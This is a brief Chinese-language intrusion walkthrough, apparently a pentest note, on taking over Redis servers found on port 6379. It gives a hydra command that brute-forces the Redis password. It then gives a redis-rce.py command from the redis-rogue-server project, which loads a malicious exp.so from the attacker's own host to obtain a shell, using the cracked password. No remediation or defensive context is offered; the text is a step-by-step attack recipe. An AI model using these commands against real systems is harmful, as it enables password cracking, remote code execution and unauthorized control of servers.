Fscan扫描网段发现了一些开启了6379
的服务器,逐个尝试了下未授权,然后尝试了下爆破
hydra爆破redis
hydra -P [字典目录] redis://xxx.xxx.xxx.xxx
结果还真让爆出来一个
得到密码后,连接上去,这里用的是Another Redis Desktop Manager
连接上去后发现redis
版本是5.0.7
,且密码已知,可以尝试Redis RCE Post Exploitation
注意so文件用未授权GetShell中的so文件:https://github.com/n0b0dyCN/redis-rogue-server
python3 redis-rce.py -r [目标IP] -L [本机地址] -f exp.so -a "qwe123456"
成功GetShell